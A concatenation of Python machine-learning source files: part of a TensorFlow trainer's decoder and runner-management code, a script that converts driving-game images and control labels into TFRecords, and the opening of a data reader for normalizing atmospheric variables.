v.Summary(k) for k, v in six.iteritems(metrics_dict)}, text_filename=os.path.join(self._eval_dir, 'score-{:08d}.txt'.format(global_step))) should_stop = global_step >= self.params.train.max_steps if self._should_report_metrics: trial_should_stop = self._trial.ReportEvalMeasure(global_step, metrics_dict, path) should_stop = should_stop or trial_should_stop return should_stop def GetDecoderDir(logdir, decoder_type, model_task_name): if model_task_name: decoder_dir = '%s_%s' % (decoder_type, model_task_name) else: decoder_dir = decoder_type return os.path.join(logdir, decoder_dir) def _GetCheckpointIdForDecodeOut(checkpoint_path, global_step): """Retrieve the checkpoint id for the decoder out file. Finds the checkpoint id in the checkpoint file name and compares to global step. If they diverge, uses the retrieved id and prints a warning. Args: checkpoint_path: path to checkpoint file. global_step: int specifying the global step of the model. Returns: Checkpoint id as int. """ ckpt_id_from_file = int(re.sub(r'.*ckpt-', '', checkpoint_path)) tf.logging.info('Loaded checkpoint is at global step: %d', global_step) tf.logging.info('Checkpoint path: %s', checkpoint_path) tf.logging.info('Checkpoint id according to checkpoint path: %d', ckpt_id_from_file) if global_step != ckpt_id_from_file: tf.logging.warning( 'Checkpoint id %d != global step %d. ' 'Will use checkpoint id from checkpoint file for ' 'writing decoder output.', ckpt_id_from_file, global_step) return ckpt_id_from_file class Decoder(base_runner.BaseRunner): """Decoder.""" def __init__(self, decoder_type, *args, **kwargs): super(Decoder, self).__init__(*args, **kwargs) self._job_name = 'decoder_' + decoder_type self.params.is_eval = True self._decoder_dir = GetDecoderDir(self._logdir, self._job_name, self._model_task_name) tf.gfile.MakeDirs(self._decoder_dir) self._decode_path = _GetSpecificCheckpoint( self.params.task.eval.load_checkpoint_from) self._summary_writer = self._CreateSummaryWriter(self._decoder_dir) self._should_report_metrics = self._job_name.startswith( FLAGS.vizier_reporting_job) with self._graph.as_default(), tf.container(self._container_id): with self._cluster, tf.device(self._cluster.GetPlacer()): self._model = self.params.Instantiate() self._params = self._model.params self._model_task = self._model.GetTask(self._model_task_name) # Note, different graphs are being constructed for different model # tasks, which may result in different node names being chosen. # Obviously, variable names has to be stay the same between train and # decode. cluster = self._cluster with tf.device(cluster.input_device): input_batch = ( self._model_task.input_generator.GetPreprocessedInputBatch()) self._dec_output = self._model_task.Decode(input_batch) self._saver = self._GetSaver() self._summary_op = tf.summary.merge_all() self.initialize_tables = tf.tables_initializer() self._initialize_local_vars = tf.local_variables_initializer() # No queues are allowed for decoder models. self.enqueue_ops = tf.get_collection(py_utils.ENQUEUE_OPS) assert not self.enqueue_ops # Saves the graph def. self._WriteToLog(self.params.ToText(), self._decoder_dir, 'params.txt') if self.params.cluster.task == 0: tf.train.write_graph(self._graph.as_graph_def(), self._decoder_dir, '%s.pbtxt' % self._job_name) def Start(self): self._RunLoop(self._job_name, self._Loop) def _Loop(self): with tf.container( self._container_id), self._GetSession(inline=False) as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) if self._decode_path: self.DecodeCheckpoint(sess, self._decode_path) else: path = None while True: path = self._FindNewCheckpoint(path, sess) if not path or self.DecodeCheckpoint(sess, path): break # Maybe decode the last checkpoint if we are not given a specific # checkpoint to decode. if self._decode_path is None: self.DecodeLatestCheckpoint(path) if self._should_report_metrics: self._trial.ReportDone() tf.logging.info('Decoding finished.') @classmethod def GetDecodeOutPath(cls, decoder_dir, checkpoint_id): """Gets the path to decode out file.""" out_dir = cls._GetTtlDir(decoder_dir, duration='7d') return os.path.join(out_dir, 'decoder_out_%09d' % checkpoint_id) def DecodeCheckpoint(self, sess, checkpoint_path): """Decodes `samples_per_summary` examples using `checkpoint_path`.""" p = self._model_task.params samples_per_summary = p.eval.decoder_samples_per_summary if not samples_per_summary: samples_per_summary = p.eval.samples_per_summary self._LoadCheckpointForEval(sess, checkpoint_path) global_step = sess.run(py_utils.GetGlobalStep()) dec_metrics = self._model_task.CreateDecoderMetrics() buffered_decode_out = [] num_examples_metric = dec_metrics['num_samples_in_batch'] start_time = time.time() while num_examples_metric.total_value < samples_per_summary: tf.logging.info('Fetching dec_output.') fetch_start = time.time() run_options = config_pb2.RunOptions( report_tensor_allocations_upon_oom=False) if self._summary_op is None: # No summaries were collected. dec_out = sess.run(self._dec_output, options=run_options) else: dec_out, summary = sess.run([self._dec_output, self._summary_op], options=run_options) self._summary_writer.add_summary(summary, global_step) post_process_start = time.time() tf.logging.info('Done fetching (%f seconds)' % (post_process_start - fetch_start)) decode_out = self._model_task.PostProcessDecodeOut(dec_out, dec_metrics) if decode_out: buffered_decode_out.extend(decode_out) tf.logging.info( 'Total examples done: %d/%d ' '(%f seconds decode postprocess)', num_examples_metric.total_value, samples_per_summary, time.time() - post_process_start) summaries = {k: v.Summary(k) for k, v in six.iteritems(dec_metrics)} elapsed_secs = time.time() - start_time example_rate = num_examples_metric.total_value / elapsed_secs summaries['examples/sec'] = metrics.CreateScalarSummary( 'examples/sec', example_rate) self._WriteSummaries( self._summary_writer, os.path.basename(self._decoder_dir), global_step, summaries, text_filename=os.path.join(self._decoder_dir, 'score-{:08d}.txt'.format(global_step))) self._ExportMetrics( decode_checkpoint=global_step, dec_metrics=dec_metrics, example_rate=example_rate) if buffered_decode_out: # global_step and the checkpoint id from the checkpoint file might be # different. For consistency of checkpoint filename and decoder_out # file, use the checkpoint id as derived from the checkpoint filename. checkpoint_id = _GetCheckpointIdForDecodeOut(checkpoint_path, global_step) decode_out_path = self.GetDecodeOutPath(self._decoder_dir, checkpoint_id) self._WriteKeyValuePairs(decode_out_path, buffered_decode_out) should_stop = global_step >= self.params.train.max_steps if self._should_report_metrics: trial_should_stop = self._trial.ReportEvalMeasure(global_step, dec_metrics, checkpoint_path) should_stop = should_stop or trial_should_stop return should_stop def DecodeLatestCheckpoint(self, last_path=None): """Runs decoder on the latest checkpoint.""" with tf.container(self._container_id), self._GetSession() as sess: # This initializes local tables sess.run(self.initialize_tables) # This initializes local variables. sess.run(self._initialize_local_vars) path = tf.train.latest_checkpoint(self._train_dir) if not path: tf.logging.info('No checkpoint available.') return elif path == last_path: tf.logging.info('Latest checkpoint was already decoded.') return self.DecodeCheckpoint(sess, path) class RunnerManager(object): """Helper class for managing runners.""" # This is a hack so these classes can be overridded with internal # non-public implementations. # pylint: disable=invalid-name inference_graph_exporter = inference_graph_exporter model_registry = model_registry Controller = Controller Trainer = Trainer TrainerTpu = TrainerTpu Evaler = Evaler Decoder = Decoder # pylint: enable=invalid-name def __init__(self, model): self._model_name = model def MaybeLaunchTensorFlow(self): """Starts TF machinary in this process.""" if FLAGS.run_locally: return tf.logging.info('Launching tensorflow.') target = FLAGS.tf_master if not target.startswith('localhost'): # E.g., trainer_client is configured w/ FLAGS.tf_master pointing to # another job. In that case, start a local server. job_specs = FLAGS.cluster_spec.split('@') cluster_spec_dict = {} for job_spec in job_specs: # ps_host=worker1:1231,worker2:1234 job_machines = job_spec.split('=') if len(job_machines) != 2: raise ValueError('Invalid job specification: %s', job_spec) cluster_spec_dict[job_machines[0]] = job_machines[1].split(',') self._tf_server = tf.train.Server( tf.train.ClusterSpec(cluster_spec_dict), job_name=FLAGS.job, task_index=FLAGS.task) target = self._tf_server.target if not FLAGS.tf_master: FLAGS.tf_master = target with tf.Session(target).as_default(): value = (tf.constant(1.) + tf.constant(1.)).eval() assert value == 2.0, 'Something is really wrong.' tf.logging.info('Launched tensorflow.') def GetParamsForDataset(self, job_name, dataset_name): """Returns params for job `job_name` on the dataset `dataset_name`.""" # Get the current cluster and update its params from flags. cluster = cluster_factory.Current() self.UpdateClusterParamsFromFlags(cluster.params, job_name) with cluster_factory.Cluster(cluster.params): try: cfg = self.model_registry.GetParams(self._model_name, dataset_name) except AttributeError as e: dataset_name_retry = dataset_name.title() tf.logging.warning( 'Exception configuring dataset %s, retrying as %s: %s', dataset_name, dataset_name_retry, e) cfg = self.model_registry.GetParams(self._model_name, dataset_name_retry) tf.logging.warning('Succeeded after retrying as %s.' % dataset_name_retry) cfg.cluster = cluster.params # Updates a few params based on flags. if FLAGS.enqueue_max_steps: cfg.train.enqueue_max_steps = FLAGS.enqueue_max_steps if FLAGS.saver_max_to_keep: cfg.train.save_max_to_keep = FLAGS.saver_max_to_keep if FLAGS.saver_keep_checkpoint_every_n_hours: cfg.train.save_keep_checkpoint_every_n_hours = FLAGS.saver_keep_checkpoint_every_n_hours return cfg def MaybeConfigRunDistributed(self): """If given a `FLAGS.cluster_spec`, update flags for running distributed.""" if not FLAGS.cluster_spec: return job_specs = FLAGS.cluster_spec.split('@') cluster_spec_dict = {} for job_spec in job_specs: # ps_host=worker1:1231,worker2:1234 job_machines = job_spec.split('=') if len(job_machines) != 2: raise ValueError('Invalid job specification: %s', job_spec) cluster_spec_dict[job_machines[0]] = job_machines[1].split(',') if FLAGS.job == 'trainer_client': FLAGS.tf_master = 'grpc://%s' % cluster_spec_dict['worker'][FLAGS.task] for job in cluster_spec_dict.keys(): if job.startswith('decoder_'): assert len(job_specs) == 1, 'Decoder jobs must run on their own' assert ',' not in job_specs[0], 'Only single machine supported' FLAGS.decoder_job = '/job:%s' % job FLAGS.decoder_replicas = 1 if job.startswith('evaler_'): assert len(job_specs) == 1, 'Evaler jobs must run on their own' assert ',' not in job_specs[0], 'Only single machine supported' FLAGS.evaler_job = '/job:%s' % job FLAGS.evaler_replicas = 1 if FLAGS.mode == 'sync' and FLAGS.job in ('controller', 'trainer_client', 'worker'): FLAGS.worker_job = '/job:worker' FLAGS.worker_replicas = len(cluster_spec_dict['worker']) FLAGS.ps_job = '/job:worker' FLAGS.ps_replicas = FLAGS.worker_replicas if FLAGS.mode == 'async' and FLAGS.job in ('controller', 'trainer', 'ps'): FLAGS.worker_job = '/job:trainer' FLAGS.worker_replicas = len(cluster_spec_dict['trainer']) FLAGS.ps_job = '/job:ps' FLAGS.ps_replicas = len(cluster_spec_dict['ps']) def UpdateClusterParamsFromFlags(self, cluster, job_name): """Update `cluster` with a training cluster configuration from flags.""" cluster.mode = FLAGS.mode cluster.job = job_name cluster.task = FLAGS.task cluster.controller.name = FLAGS.controller_job cluster.controller.gpus_per_replica = FLAGS.controller_gpus cluster.worker.name = FLAGS.worker_job cluster.worker.replicas = FLAGS.worker_replicas cluster.worker.gpus_per_replica = FLAGS.worker_gpus cluster.worker.tpus_per_replica = FLAGS.worker_tpus cluster.worker.num_tpu_hosts = FLAGS.worker_num_tpu_hosts cluster.worker.devices_per_split = FLAGS.worker_split_size cluster.ps.name = FLAGS.ps_job cluster.ps.replicas = FLAGS.ps_replicas cluster.ps.gpus_per_replica = FLAGS.ps_gpus cluster.input.name = FLAGS.input_job cluster.input.replicas = FLAGS.input_replicas cluster.input.targets = FLAGS.input_targets cluster.evaler.name = FLAGS.evaler_job cluster.evaler.replicas = FLAGS.evaler_replicas cluster.evaler.gpus_per_replica = FLAGS.evaler_gpus cluster.decoder.name = FLAGS.decoder_job cluster.decoder.replicas = FLAGS.decoder_replicas cluster.decoder.gpus_per_replica = FLAGS.decoder_gpus def _CreateRunner(self, job, model_task_name, logdir, tf_master, trial): """Create a runner.""" evaler_job_name_prefix = 'evaler_' decoder_job_name_prefix = 'decoder_' tf.logging.info('Job %s start', job) common_args = (model_task_name, logdir, tf_master, trial) if job == 'controller': cfg = self.GetParamsForDataset('controller', 'Train') return self.Controller(cfg, *common_args) elif job == 'trainer': cfg = self.GetParamsForDataset('trainer', 'Train') return self.Trainer(cfg, *common_args) elif job == 'trainer_client': cfg = self.GetParamsForDataset('trainer_client', 'Train') if py_utils.use_tpu(): return self.TrainerTpu(cfg, *common_args) else: return self.Trainer(cfg, *common_args) elif job.startswith(evaler_job_name_prefix): dataset_name = job[len(evaler_job_name_prefix):] cfg = self.GetParamsForDataset('evaler', dataset_name) return self.Evaler(dataset_name.lower(), cfg, *common_args) elif job.startswith(decoder_job_name_prefix): dataset_name = job[len(decoder_job_name_prefix):] cfg = self.GetParamsForDataset('decoder', dataset_name) return self.Decoder(dataset_name.lower(), cfg, *common_args) elif job in ('ps', 'worker', 'input'): self._tf_server.join() else: raise ValueError('job %s is not supported' % job) def CreateRunners(self, jobs, logdir, trial=base_trial.NoOpTrial()): """Creates a list of runners based on `FLAGS.mode`. Args: jobs: a list of runner jobs. logdir: the directory used for logging, usually on CNS. trial: optional `Trial` object, used for reporting measures and early stopping. Returns: A list of `.BaseRunner`, one per job in `jobs`. """ runners = [] for j in jobs: tf_master = FLAGS.tf_master # Ensure that decoder or evaler threads do not clobber variables being # updated by trainer by forcing them to use independent sessions. if ('trainer' in jobs and (j.startswith('decoder') or j.startswith('evaler'))): tf_master = '' runner = self._CreateRunner(j, FLAGS.model_task_name, logdir, tf_master, trial) runners.append(runner) return runners def StartRunners(self, runners): """Runs `runners` in parallel threads. Returns when all of them finish. Args: runners: a list of `.BaseRunner`. Returns: None. """ threads = [] tf.logging.info('Starting runners') for runner in runners: t = threading.Thread(target=runner.Start) t.daemon = True t.start() threads.append(t) tf.logging.info('Total num runner.enqueue_ops: %d', len(runner.enqueue_ops)) for enqueue_op in runner.enqueue_ops: def StartEnqueue(runner, op): tf.logging.info('Starting enqueue op %s', op.name) return lambda: runner.StartEnqueueOp(op) tq = threading.Thread(target=StartEnqueue(runner, enqueue_op)) tq.start() threads.append(tq) tf.logging.info('Waiting for runners to finish...') for t in threads: while True: t.join(1) if not t.isAlive(): break tf.logging.info('All runners done.') def RunTrial(self, job, logdir, trial): """A wrapper function for running a trial.""" if job == 'all': # For async mode: Run controller, trainer, evaler jobs in one process, # multiple threads. self.StartRunners( self.CreateRunners(['controller', 'trainer'], logdir, trial)) evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir, FLAGS.tf_master, trial) evaler.EvalLatestCheckpoint() elif job == 'all_sync': # For sync mode: Run controller, trainer_client, evaler jobs in one # process, multiple threads. self.StartRunners( self.CreateRunners(['controller', 'trainer_client'], logdir, trial)) evaler = self._CreateRunner('evaler_dev', FLAGS.model_task_name, logdir, FLAGS.tf_master, trial) evaler.EvalLatestCheckpoint() else: # Run each job in separate process/task # TODO(rpang): add support for running evaler_test and decoder. self.StartRunners(self.CreateRunners([job], logdir, trial)) def MaybeConfigRunLocally(self): """Update flags if configured to run locally.""" if not FLAGS.run_locally: # Do nothing return FLAGS.tf_master = tf.train.Server.create_local_server().target if not FLAGS.mode: FLAGS.mode = 'sync' if not FLAGS.job: if FLAGS.run_locally == 'tpu': FLAGS.job = 'trainer_client' else: FLAGS.job = 'controller,trainer_client' FLAGS.task = 0 FLAGS.controller_job = '/job:local' FLAGS.worker_job = '/job:local' FLAGS.worker_replicas = 1 if FLAGS.run_locally == 'gpu': if not FLAGS.worker_gpus: FLAGS.worker_gpus = 1 else: FLAGS.worker_gpus = 0 if FLAGS.run_locally == 'tpu': FLAGS.xla_device = 'tpu' FLAGS.enable_asserts = False else: FLAGS.worker_tpus = 0 if not FLAGS.worker_split_size: FLAGS.worker_split_size = 1 FLAGS.ps_job = '/job:local' FLAGS.ps_replicas = 1 FLAGS.ps_gpus = 0 FLAGS.input_job = '/job:local' FLAGS.input_replicas = 0 FLAGS.evaler_job = '/job:local' FLAGS.evaler_replicas = 1 if FLAGS.run_locally == 'gpu': FLAGS.evaler_gpus = 1 else: FLAGS.evaler_gpus = 0 FLAGS.decoder_job = '/job:local' FLAGS.decoder_replicas = 1 if FLAGS.run_locally == 'gpu': FLAGS.decoder_gpus = 1 else: FLAGS.decoder_gpus = 0 def InspectModel(self): """Prints out model analysis for the model.""" FLAGS.mode = 'sync' p = self.GetParamsForDataset('controller', 'Train') c = cluster_factory.Cluster(p.cluster) with tf.Graph().as_default(), c, tf.device(c.GetPlacer()): analysis, _ = _ModelAnalysis(p.Instantiate()) print(analysis) def InspectDatasets(self): """Prints out datasets configured for the model.""" cls = self.model_registry.GetClass(self._model_name) datasets = [] for name, _ in inspect.getmembers(cls, inspect.ismethod): if name not in ['GetDatasetParams', 'Model', 'Task' ] and not name.startswith('_'): datasets += [name] print(','.join([_.lower() for _ in datasets])) def InspectDecoder(self): """Prints out datasets configured for the decoder.""" cls = self.model_registry.GetClass(self._model_name) has_decoder = False if issubclass(cls, base_model_params.SingleTaskModelParams): has_decoder = cls.Task( ).cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics else: for _, task_param in cls.Model().task_params.IterParams(): has_decoder |= ( task_param.cls.CreateDecoderMetrics != base_model.BaseTask.CreateDecoderMetrics) if has_decoder: # We assume that the proper decoder is implemented. self.InspectDatasets() else: print('') def WriteInferenceGraph(self): """Generates the inference graphs for a given model.""" inference_graph_dir = os.path.join(FLAGS.logdir, 'inference_graphs') tf.gfile.MakeDirs(inference_graph_dir) tf.logging.info('Writing inference graphs to dir: %s', inference_graph_dir) cfg = self.model_registry.GetParams(self._model_name, 'Test') if (issubclass(cfg.cls, base_model.MultiTaskModel) and not FLAGS.model_task_name): tf.logging.info('Cannot write inference graphs for multi-task model ' 'when model_task_name is not specified.') return try: filename_prefix = 'inference' if FLAGS.model_task_name: filename_prefix = '%s_inference' % FLAGS.model_task_name filename_prefix = os.path.join(inference_graph_dir, filename_prefix) # Standard inference graph. self.inference_graph_exporter.InferenceGraphExporter.Export( model_cfg=cfg, model_task_name=FLAGS.model_task_name, export_path=filename_prefix + '.pbtxt') except NotImplementedError as e: tf.logging.error('Cannot write inference graph: %s', e) # TPU inference graph. Not all models support it so fail silently. try: self.inference_graph_exporter.InferenceGraphExporter.Export( model_cfg=cfg, model_task_name=FLAGS.model_task_name, device_options=self.inference_graph_exporter.InferenceDeviceOptions( device='tpu', retain_device_placement=False, var_options='ON_DEVICE', gen_init_op=True, dtype_override=None), export_path=filename_prefix + '_tpu.pbtxt') except Exception as e: # pylint: disable=broad-except tf.logging.info('Error exporting TPU inference graph: %s' % e) def Start(self): """Start the process.""" tf.logging.set_verbosity(tf.logging.INFO) assert self.model_registry.GetClass( self._model_name), ('Model %s is not found.' % FLAGS.model) if FLAGS.mode == 'inspect_model': self.InspectModel() return if FLAGS.mode == 'inspect_evaler': self.InspectDatasets() return if FLAGS.mode == 'inspect_decoder': self.InspectDecoder() return if FLAGS.mode == 'write_inference_graph': self.WriteInferenceGraph() return if FLAGS.mode == 'shell': _StartShell(locals()) return assert FLAGS.mode in ['sync', 'async'] self.MaybeConfigRunLocally() self.MaybeConfigRunDistributed() self.MaybeLaunchTensorFlow() self.StartRunners(self.CreateRunners(FLAGS.job.split(','), FLAGS.logdir)) def main(unused_argv): # pylint: disable=g-import-not-at-top # pylint: disable=unused-variable from lingvo import model_imports RunnerManager(FLAGS.model).Start() if __name__ == '__main__': tf.app.run(main)
gta_tfrecords_3Dconvolutions.py
# coding: utf-8 # Copyright 2016 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Converts image data to TFRecords file format with Example protos. The image data set is expected to reside in JPEG files located in the following directory structure. data_dir/image0.jpeg data_dir/image1.jpg ... label_dir/weird-image.jpeg label_dir/my-image.jpeg ... This TensorFlow script converts the training and evaluation data into a sharded data set consisting of TFRecord files """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from datetime import datetime from collections import deque import os import random import sys import threading import cv2 import pandas as pd import numpy as np import tensorflow as tf tf.app.flags.DEFINE_integer('num_threads', 1 , 'Number of threads to preprocess the images.') FLAGS = tf.app.flags.FLAGS def _float_feature(value): if not isinstance(value,list): value=[value] return tf.train.Feature(float_list=tf.train.FloatList(value=value)) def _int64_feature(value): """Wrapper for inserting int64 features into Example proto.""" if not isinstance(value, list): value = [value] return tf.train.Feature(int64_list=tf.train.Int64List(value=value)) def _bytes_feature(value): """Wrapper for inserting bytes features into Example proto.""" return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value])) def _convert_to_example(in_example,labels): """Build an Example proto for an example. Args: image : image as string labels: a list containing [throttle,brake,steering] Returns: Example proto """ example = tf.train.Example(features=tf.train.Features(feature={ 'steering': _float_feature(labels[0]), 'throttle':_float_feature(labels[1]), 'brake':_float_feature(labels[2]), 'speed': _float_feature(labels[3]), 'image': _bytes_feature(tf.compat.as_bytes(in_example)) })) return example class ImageCoder(object): """Helper class that provides TensorFlow image coding utilities.""" def __init__(self,labels_filename): # Create a single Session to run all image coding calls. self._sess = tf.Session() # Initializes function that decodes RGB png data. self._png_data = tf.placeholder(dtype=tf.string) self._decode_png = tf.image.decode_image(self._png_data, channels=3) self.csv = pd.read_csv(labels_filename,header=None) def decode_png(self,image_data): return self._sess.run(self._decode_png,feed_dict={self._png_data:image_data}) def _is_png(filename): """Determine if a file contains a PNG format image. Args: filename: string, path of the image file. Returns: boolean indicating if the image is a PNG. """ return '.png' in filename def _process_image(filename, coder): """Process a single image file. Args: filename: string, path to an image file e.g., '/path/to/example.JPG'. coder: instance of ImageCoder to provide TensorFlow image coding utils. Returns: image_buffer: string, JPEG encoding of RGB image. height: integer, image height in pixels. width: integer, image width in pixels. """ # Read the image file. with tf.gfile.FastGFile(filename, 'rb') as f: image_data = f.read() # tf.read_file() # sess = tf.Session() # image=sess.run(tf.image.decode_png(tf.read_file(filename),channels=3)) # Decode the RGB JPEG. # image = coder.decode_png(image_data) # # Check that image converted to RGB # assert len(image.shape) == 3 # height = image.shape[0] # width = image.shape[1] # assert image.shape[2] == 3 return image_data def _process_image_files_batch(coder, thread_index, ranges, name, image_filenames, num_shards, output_directory): """Processes and saves list of images as TFRecord in 1 thread. Args: coder: instance of ImageCoder to provide TensorFlow image coding utils. thread_index: integer, unique batch to run index is within [0, len(ranges)). ranges: list of pairs of integers specifying ranges of each batches to analyze in parallel. name: string, unique identifier specifying the data set image_filenames: list of strings; each string is a path to an image file label_filenames: list of strings; each string is a path to an image file num_shards: integer number of shards for this data set. """ # Each thread produces N shards where N = int(num_shards / num_threads). # For instance, if num_shards = 128, and the num_threads = 2, then the first # thread would produce shards [0, 64). num_threads = len(ranges) assert not num_shards % num_threads num_shards_per_batch = int(num_shards / num_threads) shard_ranges = np.linspace(ranges[thread_index][0], ranges[thread_index][1], num_shards_per_batch + 1).astype(int) num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0] counter = 0 img_queue = deque([], maxlen=11) for s in range(num_shards_per_batch): # Generate a sharded version of the file name, e.g. 'train-00002-of-00010' shard = thread_index * num_shards_per_batch + s output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards) output_file = os.path.join(output_directory, output_filename) writer = tf.python_io.TFRecordWriter(output_file) shard_counter = 0 files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int) for i in files_in_shard: orig = image_filenames+'/img'+str(i)+'.png' img = cv2.cvtColor(cv2.imread(orig),cv2.COLOR_RGB2BGR) label = coder.csv.values[i].tolist() img_queue.append(img) # image_buffer = _process_image(orig, coder) if counter > 10: example = _convert_to_example(np.array(img_queue).tostring(),label) writer.write(example.SerializeToString()) shard_counter += 1 counter += 1 if not counter % 1000: print('%s [thread %d]: Processed %d of %d images in thread batch.' % (datetime.now(), thread_index, counter, num_files_in_thread)) sys.stdout.flush() writer.close() print('%s [thread %d]: Wrote %d images to %s' % (datetime.now(), thread_index, shard_counter, output_file)) sys.stdout.flush() shard_counter = 0 print('%s [thread %d]: Wrote %d images to %d shards.' % (datetime.now(), thread_index, counter, num_files_in_thread)) sys.stdout.flush() def _process_image_files(name, orig_filenames, label_filenames, num_shards, output_directory): """Process and save list of images as TFRecord of Example protos. Args: name: string, unique identifier specifying the data set orig_filenames: list of strings; each string is a path to an image file label_filenames: list of strings; each string is a path to an image file num_shards: integer number of shards for this data set. output_directory : Directory for output files """ # Create a generic TensorFlow-based utility for converting all image codings. coder = ImageCoder(labels_filename = label_filenames) print ('labels_length : ',coder.csv.shape[0]) spacing = np.linspace(0, coder.csv.shape[0], FLAGS.num_threads + 1).astype(np.int) ranges = [] for i in range(len(spacing) - 1): ranges.append([spacing[i], spacing[i+1]]) # Launch a thread for each batch. print('Launching %d threads for spacings: %s' % (FLAGS.num_threads, ranges)) sys.stdout.flush() # Create a mechanism for monitoring when all threads are finished. coord = tf.train.Coordinator() threads = [] for thread_index in range(len(ranges)): args = (coder, thread_index, ranges, name, orig_filenames, num_shards, output_directory) t = threading.Thread(target=_process_image_files_batch, args=args) t.start() threads.append(t) # Wait for all the threads to terminate. coord.join(threads) print('%s: Finished writing all %d images in data set.' % (datetime.now(), len(orig_filenames))) sys.stdout.flush() def main(orignal_image_folder, label_filename, output_directory, num_shards): # orig_img_paths = [os.path.join(orignal_image_folder,im) for im in os.listdir(orignal_image_folder) if os.path.isfile (os.path.join(orignal_image_folder,im))] _process_image_files("train", orignal_image_folder, label_filename, num_shards, output_directory) if __name__ == '__main__': if len(sys.argv) < 5: print ("Usage imagesToTfrecords <input_images_folder> <label_images_folder> <output_folder> <num partitions (multiples of 4)>") else: main(sys.argv[1], sys.argv[2], sys.argv[3], int(sys.argv[4])) # For reading files # import tensorflow as tf # import matplotlib.pyplot as plt # filename = "../Data/tfrecords/cool-00000-of-00004" # sess = tf.Session() # for serialized_example in tf.python_io.tf_record_iterator(filename): # example = tf.train.Example() # example.ParseFromString(serialized_example) # # traverse the Example format to get data # img = example.features.feature['origimage/encoded'] # # get the data out of tf record # orignal_image_height = example.features.feature['orig/image/height'] # orignal_image_width = example.features.feature['orig/image/width'] # orignal_image_colors = example.features.feature['orig/image/colorspace'] # orignal_image_channels = example.features.feature['orig/image/channels'] # orignal_image_format = example.features.feature['orig/image/format'] # orignal_image_filename = example.features.feature['orig/image/filename'] # orignal_image_data = example.features.feature['orig/image/encoded'] # noisy_image_height = example.features.feature['label/image/height'] # noisy_image_width = example.features.feature['label/image/width'] # noisy_image_colors = example.features.feature['label/image/colorspace'] # noisy_image_channels = example.features.feature['label/image/channels'] # noisy_image_format = example.features.feature['label/image/format'] # noisy_image_filename = example.features.feature['label/image/filename'] # noisy_image_data = example.features.feature['label/image/encoded'] # orignal_image = sess.run(tf.image.decode_jpeg(orignal_image_data.bytes_list.value[0], channels=3)) # noisy_image = sess.run(tf.image.decode_jpeg(noisy_image_data.bytes_list.value[0], channels=3)) # plt.subplot(121) # plt.title("Image Name : " + str(orignal_image_filename.bytes_list.value[0]) + "\n" + # "Image Height : " + str(orignal_image_height.int64_list.value[0]) + "\n" + # "Image Weight : " + str(orignal_image_width.int64_list.value[0]) + "\n" + # "Image ColourSpace : " + str(orignal_image_colors.bytes_list.value[0]) + "\n" + # "Image Channels : " + str(orignal_image_channels.int64_list.value[0]) + "\n" + # "Image format : " + str(orignal_image_format.bytes_list.value[0]) + "\n") # plt.imshow(orignal_image) # plt.subplot(122) # plt.title("Image Name : " + str(noisy_image_filename.bytes_list.value[0]) + "\n" + # "Image Height : " + str(noisy_image_height.int64_list.value[0]) + "\n" + # "Image Weight : " + str(noisy_image_width.int64_list.value[0]) + "\n" + # "Image ColourSpace : " + str(noisy_image_colors.bytes_list.value[0]) + "\n" + # "Image Channels : " + str(noisy_image_channels.int64_list.value[0]) + "\n" + # "Image format : " + str(noisy_image_format.bytes_list.value[0]) + "\n") # plt.imshow(noisy_image) # plt.show() # break
fileReader.py
import fnmatch import os import random import re import threading import json import tensorflow as tf from netCDF4 import Dataset import numpy as np from sklearn.metrics import mean_squared_error from scipy.interpolate import splev, splrep """ Data v7: statistical values ST: min 100.0000000000 max 333.1499946801 mean 268.1406929063 std 37.5368706325 C: min 0.0000000000 max 0.0099999904 mean 0.0017284657 std 0.0023850203 R: min -255.9600440474 max 78.3198382662 mean -1.3758656541 std 6.1112494507 T: min 100.0000000000 max 355.5721906214 mean 230.1788102309 Td 46.5063403685 H: min -2720.3344538111 max 1848.3667831706 mean 4.2050377031 Hd 13.4852605066 """ # #minT = 178.87485 minT = 150 #maxT = 310.52261 maxT = 340 minC = 0 maxC = 0.01 #minH = 6.324828e-08 minH = 0 #maxH = 0.021951281 maxH = 0.1 minR = -59.08844 maxR = 14.877947 minP = 0.0 maxP = 103000 epoch = 0 lock = threading.Lock() standard_x = np.linspace(1, 10000, 10) standard_x = np.append(standard_x, np.linspace(11000, 80000, 25)) standard_x = np.append(standard_x, np.linspace(82760, 103000, 25)) standard_x = standard_x.tolist() level_size = len(standard_x) def cal_air_pressure(air_pressure_interface): air_pressure = np.empty(60) for level in range(len(air_pressure_interface) - 1): air_pressure[level] = (air_pressure_interface[level] + air_pressure_interface[level+1])*0.5 return air_pressure def normalizeT(t): return normalize(t, minT, maxT) def normalizeH(h): return normalize(h, minH, maxH) def normalizeC(c): return normalize(c, minC, maxC) def normalizeR(r): return normalize(r, minR, maxR) def normalizeP(p): return normalize(p, minP, maxP) def normalize(x, min, max, mean=1, std=1): # TODO: add option to choose between min-max of zero-mean normalization return (x - min) / (max - min) # min max normalization # return (x - mean) / std # standardization - zero-mean normalization # return x+100 def denormalize(x, mean, std): return x * std + mean def get_category_cardinality(files): """ Deprecated: function used before for identifying the samples based in its name and calculate the minimum and maximum sample id :param files: array of root paths. :return: min_id, max_id: int """ file_pattern = r'([0-9]+)\.csv' id_reg_expression = re.compile(file_pattern) min_id = None max_id = None for filename in files: id = int(id_reg_expression.findall(filename)[0]) if min_id is None or id < min_id: min_id = id if max_id is None or id > max_id: max_id = id return min_id, max_id def randomize_files(files): """ Function that randomizes a list of filePaths. :param files: list of path files :return: iterable of random files """ for file in files: file_index = random.randint(0, (len(files) - 1)) yield files[file_index] def find_files(directory, pattern='*.csv'): """ Recursively finds all files matching the pattern. :param directory: directory path :param pattern: reggex :return: list of files """ 